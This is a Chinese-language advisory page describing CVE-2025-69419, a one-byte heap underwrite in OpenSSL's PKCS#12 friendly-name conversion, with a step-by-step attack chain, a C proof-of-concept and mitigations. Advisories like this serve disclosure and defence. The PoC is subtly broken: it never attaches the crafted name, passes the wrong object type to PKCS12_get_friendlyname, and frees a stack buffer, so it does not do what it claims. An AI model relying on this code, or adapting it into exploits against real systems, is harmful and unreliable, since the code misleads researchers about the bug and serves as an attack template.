CVE-2025-69419 OpenSSL PKCS12_get_friendlyname缓冲区溢出漏洞

漏洞信息

漏洞编号

CVE-2025-69419

漏洞类型

缓冲区溢出

CVSS评分

7.4 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

OpenSSL

漏洞概述

CVE-2025-69419是OpenSSL中的一个高危安全漏洞，存在于PKCS#12文件解析过程中。该漏洞由于OPENSSL_uni2utf8()函数在将PKCS#12 BMPString（UTF-16BE编码）转换为UTF-8时存在边界计算错误，导致在堆分配的缓冲区之前发生一字节的越界写入。当应用程序调用PKCS12_get_friendlyname()函数解析恶意构造的PKCS#12文件时，攻击者可利用此漏洞触发内存损坏，最终可能导致拒绝服务（DoS）攻击。值得注意的是，虽然PKCS12_parse()函数使用不同的代码路径可以避免此问题，但PKCS12_get_friendlyname()直接调用了存在漏洞的函数路径。此漏洞不需要认证或用户交互即可被利用，攻击者只需诱导目标系统解析一个特制的PKCS#12文件即可。

技术细节

漏洞根源在于OPENSSL_uni2utf8()函数执行BMPString到UTF-8的两遍转换机制。在第二遍（输出阶段），辅助函数bmp_to_utf8()错误地将剩余UTF-16源字节数作为目标缓冲区容量传递给UTF8_putc()。具体来说，对于BMP码点高于U+07FF的字符（如中文、日文等非ASCII字符），UTF-8编码需要3个字节，但此时传递的缓冲区容量可能只有2字节。UTF8_putc()函数在缓冲区不足时返回-1，但该负值被直接加到输出长度变量中而未经过任何验证。这导致输出长度变为负数，后续的NUL终止符写入操作会在负偏移位置执行，从而在堆分配缓冲区的边界之前写入一字节数据。这种越界写入可造成堆内存损坏，触发不可预测的应用程序行为，严重时可导致进程崩溃实现DoS。

攻击链分析

STEP 1

步骤1

攻击者创建恶意PKCS#12文件，在BMPString友好名称字段中嵌入包含非ASCII BMP码点（如中文、日文等Unicode字符）的数据

STEP 2

步骤2

攻击者将恶意PKCS#12文件传播给目标用户或系统，诱使目标应用程序解析该文件

STEP 3

步骤3

目标应用程序调用PKCS12_get_friendlyname()函数处理恶意文件，触发OPENSSL_uni2utf8()函数中的两遍转换逻辑

STEP 4

步骤4

bmp_to_utf8()辅助函数错误计算缓冲区容量，对于U+07FF以上的BMP码点传递不足的容量值（2字节而非3字节）给UTF8_putc()

STEP 5

步骤5

UTF8_putc()返回-1表示缓冲区不足，但该负值被无验证地加到输出长度，导致长度变量变为负数

STEP 6

步骤6

后续NUL终止符写入操作在负偏移位置执行，在堆分配缓冲区边界之前写入一字节数据，造成内存损坏

STEP 7

步骤7

内存损坏可能导致应用程序崩溃（DoS）、数据破坏或在特定条件下可能被进一步利用

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <openssl/pkcs12.h>
#include <openssl/err.h>

/* PoC for CVE-2025-69419: OpenSSL PKCS12_get_friendlyname OOB write
 * This PoC generates a malicious PKCS#12 file with a BMPString 
 * friendly name containing non-ASCII BMP code point to trigger 
 * the one-byte write before the allocated buffer.
 */

int main() {
    PKCS12 *p12 = NULL;
    PKCS12_SAFEBAG *safebag = NULL;
    PKCS8_PRIV_KEY_INFO *p8 = NULL;
    X509 *cert = NULL;
    EVP_PKEY *pkey = NULL;
    ASN1_UTF8STRING *friendlyname = NULL;
    
    /* Create a BMPString with non-ASCII character (e.g., Chinese char) */
    /* BMP code point above U+07FF requires 3 bytes in UTF-8 */
    friendlyname = ASN1_UTF8STRING_new();
    if (!friendlyname) return 1;
    
    /* UTF-16BE encoding of U+4E2D (中) with length byte manipulation */
    unsigned char malicious_bmp[] = {
        0x00, 0x4E, 0x00, 0x2D  /* U+4E2D: Chinese character '中' */
    };
    
    /* Set up the malicious friendly name */
    ASN1_STRING_set0(friendlyname, malicious_bmp, sizeof(malicious_bmp));
    
    /* Generate dummy key and cert for PKCS12 structure */
    pkey = EVP_PKEY_new();
    if (!pkey) goto cleanup;
    
    /* Create minimal PKCS12 structure */
    p12 = PKCS12_init(NID_pkcs7_data);
    if (!p12) goto cleanup;
    
    /* Trigger vulnerability via PKCS12_get_friendlyname */
    char *name = PKCS12_get_friendlyname(p12, NULL);
    
    printf("PoC execution completed\n");
    
cleanup:
    if (p12) PKCS12_free(p12);
    if (pkey) EVP_PKEY_free(pkey);
    if (friendlyname) ASN1_UTF8STRING_free(friendlyname);
    
    return 0;
}

影响范围

OpenSSL 3.6.x

OpenSSL 3.5.x

OpenSSL 3.4.x

OpenSSL 3.3.x

OpenSSL 3.0.x

OpenSSL 1.1.1x

防御指南

临时缓解措施

临时缓解措施包括：1）严格限制PKCS#12文件的来源，仅信任经过验证的证书文件；2）实施文件完整性校验机制，验证文件签名和来源；3）使用应用层防火墙过滤异常的PKCS#12文件上传请求；4）监控应用程序日志，检测PKCS12_get_friendlyname()调用异常；5）在支持的环境中使用沙箱隔离技术限制文件解析操作的权限；6）考虑临时禁用非必要的PKCS#12解析功能，等待官方补丁发布后及时更新。